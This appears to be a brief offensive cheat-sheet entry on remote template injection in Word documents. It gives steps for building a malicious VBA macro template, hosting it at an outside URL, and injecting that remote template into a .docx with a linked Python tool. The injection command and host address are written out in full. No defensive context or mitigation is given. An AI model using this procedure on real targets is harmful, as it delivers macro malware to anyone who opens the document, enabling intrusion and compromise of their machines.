Remote Template Injection

1. Create malicious VBA document, save it as .dot (template.dot)

2. Host .dot file, for example: http://nickelviper.com:80/template.dot

3. Create new document and save as .docx file (template.docx)

4. Inject .docx with remote template

python3 remoteinjector.py -w http://nickelviper.com/template.dot template.docx

Tooling

• https://github.com/JohnWoodman/remoteInjector